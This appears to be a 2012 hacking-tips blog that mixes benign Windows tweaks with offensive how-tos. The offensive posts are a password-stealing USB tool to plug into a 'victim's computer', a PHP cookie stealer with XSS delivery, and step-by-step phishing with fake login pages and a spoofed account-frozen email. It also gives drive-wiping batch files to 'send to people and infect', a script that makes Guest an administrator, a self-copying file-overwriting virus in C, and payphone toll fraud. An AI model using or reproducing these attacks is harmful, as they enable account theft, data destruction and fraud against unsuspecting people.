Search This Blog

Friday, January 6, 2012

-:USB Steals Pc Passwords:-






USB Steals Pc PasswordsUSB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Instructions:

1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.

2.Insert the USB in your victim's computer.

3.View folder "dump" to see the passwords.

DOWNLOAD LINK:

http://rapidshare.com/files/87198710/USBThief_zarksentinel_www.cw-network.info.rar

Password: : : : www.cw-network.info

-:Linux operating system:-

What Are The Vulnerabilities?
The main vulnerability of Linux OS is that anyone can access the code of the operating system. And, if you are not savvy enough with the programming code like hackers are. You only need to search for the correct free Linux hacking tool and you will be able to get inside in no time. 


The other problem is that many of the drivers made for determined hardware. Let's say, a printer is not created by people who have security in mind. This is specially important for a company who do not wish to find it's intellectual property is stolen each time they send something to the printing room.

So, after all of these possible loopholes inside Linux OS, you should consider using a version that has been designed with security in mind. Check www.engardelinux.com and find more about this variation of Linux OS.

What Is Kernel Hacking?
The kernel is the software inside a computer that is in charge of maintaining an adequate communication between the hardware and the rest of the software. One of the strong points among the Linux community is that the kernel of a Linux OS can be altered. And for what reason? The two main motives are fixing any problem that may arise and increase the efficiency of a driver responsible for managing a determined piece of hardware

Hacking Runescape
Runescape is a massively multiplayer online role-playing game that was launched in 2001 by Jagex Limited. The marvelous thing about this online game is that it is independent of the operating system that you are using since it works over the web using JAVA (JAVA is a platform that can work in any kind of computer since it creates a virtual machine for its own use).

But as in any online game, you will find people who are hacking Runescape. Although it is free to use and only requires some basic information for it's subscription, some hackers are willing to spend their time trying to find a backdoor or any other scheme that will permit them obtain an advantage over other players. One could say that it is inevitable due to the competitive nature of our species.

So, Runescape hacking, hacking programs for Runescape, free password hacking programs for Runescape, files for hacking Runescape and hacking Runescape accounts has become quite common among players. Although some could say that there is no grace in doing this since it is basically cheating, hackers don't think the same. For them, using any method for being the best in the game isn't only good; it's what is expected from any human being.

Thanks to free network hacking tools, hackers from around the world with a basic knowledge of English and some practice with computers, can start lurking networks everywhere, waiting for their chance to success and increase their reputation inside the hacking community. Although right now Windows is the preferred platform, Linux hacking will become a favorite amongst hackers.

-:Linux hacking:-

Since Microsoft has a huge chunk of the operating system's market in the world, it is the first victim of hackers. But that doesn't mean that Linux hacking doesn't exist. Although is less common than it's close sourced companion, there are several reasons why hackers try to hack machines with Linux. Many corporations use Linux as their server on the web as it is cheaper and easier to deploy. Its security is also better when compared to Microsoft operating systems. No wonder that network hacking tools for this open source operating system have proliferated in the last years.


What Are The Issues With Open Source Linux?
The main difference between Linux and Windows is that Linux is open source and windows are closed source. So? Well, that means that only Microsoft is authorized to change any part of the code of the Windows operating system. While in Linux, anyone can change it.

The other problem is that the Linux Operating System doesn't receive the same level of support as Windows does. That means that updates and security packages are released with each new version of the Operating System (OS), but not as periodic updates as in the case of Windows XP's Windows Update.

That means that the user will have to be the one responsible for checking for the updates instead of trusting this matter to an organization. So, a user could pass long periods of time without knowing that his OS has an important security failure that could compromise his work or even the security of his network.

The only way to contra rest this inconvenient, is buying support from a determined Linux OS provider, like Red Hat. For an annual fee, they will provide you with important information on the different bugs that have been found in the OS and that need to be fixed.

If you choose otherwise, you will spend a long time inside forums talking to Linux experts around the world. If that isn't the core competence of your business, why should you spend that time doing it? That's one of the main arguments that Microsoft uses when comparing it's OS with open source OS's.

Continue to Weakness in Linux OS

-:Talk 999 min for almost free:-

talk free from 1 rupee coin box..
Check this talk free from 1 rupee coin box..
100% Works !
yes u can talk free from 1 rupee coin box
wht u hve 2 do is first pick up the reciever
dial *** then 68807 then first 7 no.s which u r calling then #" 999"
this 999 is for your limit u can talk 999 min so u can only press no.s like this for eg
333 , 444, 555 do 999 it will be better then #0
then insert the coin nd dial full number nd u can talk for 999 minutes free
full code ***68807 first seven no.s #999#0
imp thing ------ this only works on red 1 rupee coin box do it..
It works 100% !!!

-:how-to-unlock-password-protected-memory-cards:-

Well its quite simple but most of the people do not know it.
Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.
This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.
2. Browse through the directory, C:system
3. Rename the file mmcstore to mmcstore.txt
4. Open the file - The file will open in Notes.
5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad.

-:Search Engine tips:-

If you want to get some information about any topic using search engine, the search engine will search the given information and will provide a list of links of websites along brief description about each website. You should use the right search terms for relevant results.

The following points must be noted to search the information on the internet.

· •You can type all word in lowercase and also in uppercase, search engine will return the same result. But the best practice is type search keywords always in lowercase.

•Use + sign between words if you want to search the all words. For example, to search history of Football in Europe, type as:
history+Football+Europe

•To search the exact match, write the words in double quotation marks. For example to search the map of Europe, then type as:
"Map of Europe"

• Always avoid to use "and", "or" with search keywords, because these words will affect the search result. 

-:Yahoo webcam without permission:-

Without No doubt, It almost impossible for us to achieve an access to view yahoo webcam without Permission. We believe that what we means about, Accessing Yahoo Webcam without Permission is a way we don’t even need an permission or acceptance from the owner of the web cam of yahoo messenger to view their webcam. We already knew that Yahoo Messenger designed to handle view webcam had to accept first from the user before they can view their webcam. So, is there any possibility to view Yahoo Messenger webcam without Permission?


Access View Yahoo Webcam Auto Accept
Legally, there is only one way to view webcam “without need a permission”. Without need a permission here, means that we don’t even to wait the owner of the yahoo webcam to click or push the accept button of request window of yahoo messenger webcam. It is better if we call this “without need a permission” in legal way is “Yahoo Webcam Auto Accept“. How to make auto accept of Yahoo Webcam? Go to webcam setting and then add user in the box of “Always allow the following people to view my webcam“. This will make the user that has this option will always set auto accept when they are requesting the owner webcam. The problem is how we can add our yahoo id in there? Just figure it out how you can do it. OK?





View Webcam Without Permission Remote Webcam




We will tell you, this software called as I Can See You is work like CCTV. That way we can use it as “Webcam Without Permission”. Without Permission in here means that we don’t need to accept the view webcam or when we try to view webcam because the web cam is always set accepted. No need Messenger Client Service to do it. All we have to have just Webcam and Internet Connection. How to achieve it?

Like we said above, this Remote Webcam is software that will remote from others computer of the webcam computer that been installed the software. For example, we can view our webcam in home or office when we are far away from them such as in vacation or in a way home.

Unfortunately, this software that sometime called as Webcam Spy is not freeware software. You need to buy it to use it. You can buy at here  

-:Yahoo multi messenger without software:-

I am going to tell abt yahoo multimessenger.... with installing any software....main thing is u can get same version of messenger u r using...which is not possible with yahoo multimessenger software just make the things as following.... go to start menu and select run just type "regedit" in that now u will get a window now in that select HKEY_CURRENT_USER in that go for SOFTWARE ----->YAHOO---->PAGER----->TEST now just slect on TEST on the right side u can see name type data in that u will have default........... now below default just right clik and create new one .....in new u have to select DWORD VALUE then right click on created one and rename it to 'plural'

again right click on it and u can c MODIFY clik on it .. now change VALUE DATA to 1 and there itself change BASE to decimal from hexadecimal.....thats it frndz... now just once logoff from ur messenger and again sign in..... now just clik on the yahoo messenger where u will open ur messenger usually....u can open any no of messenger u want...
...enjoy frndz,,,.
From Hackit!!!

-:Change the Default Directory of Software Installation:-

You may want to change the location of your system default folder (C:Program Files) from C drive to another system drives (D or E drive). By default software setup will attempt to install program in C:Program Files directory. It is good practice to make the backup of the installed programs, if you installed all your programs in other than C drive. If you have little knowledge about editing windows registry then you can configure your computer for this purpose.

Follow the given steps to configure windows registry:

1. Click on Start button then type Regedit in Run option.

2. Here navigate to: HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion

3. In right side panel, double click on ProgramFileDir.

4. Now modify the value to any other drive (for example D:Program Files).


Now close the registry editor and restart your computer after any changes to go into effect.

Thursday, January 5, 2012

-:Hack This Website Test:-

If you really think you are a hacker, then

Go to:


www.hack-test.com


Reply with what level you are on!!

-:Top 15 Hacking Software:-

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
 
Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
 
Get Nessus Here


3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
 
Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here


6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
 
Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
 
 Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.
 
Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
 
Get Eraser Here

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
 
Get PuTTY Here

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article
 
Get LCP Here


12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
 
Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
 
Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
 
Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
 
Get hping Here
 

-:Page hits flooder:-

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorer method:
make a batch file with these lines

@echo off
:1
start C:Progra~1Intern~1iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1


depending upon your net speed u may increase the 10 secs time wait


with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

-:Asterisk Passwords Using Javascript:-

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

-:Cookie stealing:-

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie.

Here’s an example of what might be in your cookie:
Code:
username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:

Code:
$cookie = $_GET['cookie'];
$log = fopen(”log.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script:

Code:
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:

Code:
Click Me
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.

-:Create your own f@ke login page!!!:-

This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”

Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar.

NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.

I suppose that you created your account at 110mb.com

now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.

Now you can access you file on the net by just typing the url ofthe file.

And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form. 

-:How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other:-

First of all you need to create an account in a form handling service
like http://www.webformdesigner.net/wfd_signup_form.php .
In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.Now follow the following steps : Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML

Now open the the file yahoofake.html using noepad, here you ll find a code which starts with

( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”)) Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
put the following code after placing your form id:

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page.

Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.



First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”. Now select your site name as mail.yahoo.com/support.

You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.


Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.


Good Luck !


CLICK HERE TO MAKE YOUR OWN FAKE PAGE

-:Internet Error Codes and Meaning:-

Sometime you are browsing the internet and trying to open any website, your e-mail and any FTP sites , but you see different error codes there. You should be familiar with these error codes. You can solve these problems if you are well-known with the meaning of error codes.


Error Codes
Meaning
400 This is bad request error, First check you may be typing wrong URL name and server could not understand your request.
401 You are trying to open any unauthorized access site or page. Check your username and password if you are trying to open any webpage.
402 Payment Required Error
403 You are trying to open any forbidden page and you are blocked by that domain.
404 Here you are trying to open the webpage that was removed or re-named, also check the URL spelling.
408 This is time out error. you should send the request with in time that the server set for you.

-:ASCII Art made easy:-

Do u want to convert ur images into a textual art like this.........






go to this site :::::

 http://www.degraeve.com/img2txt.php#sample

 and make ur own textz......

-:Convert Guest to admin in windows Xp:-

Convert Guest to admin in windows Xp

[Start copying]

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

[End copying]

Copy it in NOTEPAD and save the file as "Guest2admin.bat"

then u can double click the file to execute or run in the cmd.
it works...

Note : Make sure that you have Guest profile on
 

-:Who Used Your Pc In Your Absence:-

Who Used Your Pc In Your Absence,what Did He Do?

first you should go

start > run >eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

 Hope u all will like it.
Thnks n enjoy

-:Start a movie in paint:-

Start A movie in paint!
Start movie in Paint!

* First start a movie in any player.
* Then open Paint.
* Now, in the player when the movie is being played, press "Print screen" button on your key board.
* Now, Press ctrl+v in Paint
* Leave the movie player open and don't minimize it.
* Open Paint now and see the movie in the Paint!

-:How to Format A HDD With Notepad:-

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c: /Q/X — this will format your drive c:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d: /Q/X — this will format your dirve d:

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a: /Q/X — this will format your drive a:

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only




still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C: *.*|y

save it as Dell.bat

want worse then type the following:
@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

-:How to disable the right click functionality on the desktop:-

Follow the given steps to disable the right click functionality on desktop:

To use this feature, you will need to be logged into your computer with administrative rights.
Click Start button and type regedit in Run option then press Enter for next.

Here locate the location to:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Here in right side panel, right click to create a new DWORD value with the name NoViewContextMenu (it is case sensitive), then assign number 1 in value data box.





Now close the registry editor and restart your computer after any changes to go into effect.

But next time, if you want to enable right click functionality on desktop then simply change the value of data box or delete the NoViewContextMenu DWORD item.
 

-:Change someone's windows password:-

This hack works if you are at someone else's home and you are logged into the account of the person whose account you want to hack. This also works if you want to hack someone else's account on your pc bit do not know his/her password.
Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack. RIGHT
CLICK and then click on SET PASSWORD from the pop-up menu.


Enter the new password. Click on OK.

-:Customize Windows Media Player Title Bar:-

Change the title bar to read Windows Media Player provided by , so if I had entered text MAYANK , it would read: Windows Media Player provided by MAYANK.

[Start] [Run] [Regedit]

HKEY_CURRENT_USER>Software>Policies>Microsoft Create the Key [WindowsMediaPlayer] Create String value named [TitleBar]

Data Type: REG_SZ // Value Name: TitleBar
Double click TitleBar and Enter the text to be displayed in the title bar.

Exit Registry / Reboot

-:Countdown timer for shutdown computer:-

Many a times people like to sleep on music, but the problem is that the comp will continue running the whole night. Here is how you can create a countdown timer to shutdown your comp in your specified time.

Go to run in start menu and input this command

shutdown -s -t 3600

this will create a countdown timer which will go off in 3600 seconds (1 Hour). you can replace the 3600 to any time limit you want the comp to shutdown ,but remember the time should always be expressed in seconds i.e if u want the comp to shutdown in Half an hour you have to write 1800 and so on...

If you are as lazy as me and don't want to input the command each time, then create a batch file or shortcut

Batch:
open a notepad and type

shutdown -s -t 3600

now in the files menu select "save as" and save this file as Activate.bat

Just double clicking this file will activate your timer

Shortcut:
On the desktop right click and create a new shortcut. in the location type

shutdown -s -t 3600

Give it any name like "Activate timer"
Again, double clicking this newly created shortcut will do the same.

FORCING THE SHUTDOWN:

another operator that you can use with this command is -f . this will force a shutdown on system. suppose you want the comp to shutdown as quickly as possible you can give command

shutdown -s -f -t 00

here we have used a -f operator and the delay is set to 0 seconds.

(as we are talking about quick shutdown, u can use command
c:windowssystem32tsshutdn.exe 00 /POWERDOWN /DELAY:00 also)

STOPPING THE TIMER:
Any time when you want to stop the running timer use a -a operator(standing for abort)

the command is

shutdown -a

You can use it in any way u prefer, like direct input in run (or command prompt) , create a .bat file or create a shortcut on desktop

SOME OTHER OPTIONS:

shutdown -r (restarting)
shutdown -r -t 3600 (timer for restarting in 1 hour)
shutdown -r -f -t 00 (quick reboot)

-:One-click PC shut down:-

This is really very easy one but very effective one. Enjoy it!

First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c “Rebooting your PC”
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c “Bye Bye m8!”
shutdown -r -t 03 -c “I ll be back m8 !”

Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC.

-:Simple Virus Coding (Only for knowledge purpose):-

Run this on your own responsibility

VIRUS CODE


/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......
*/

#include<stdio.h>
#include<conio.h>

void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}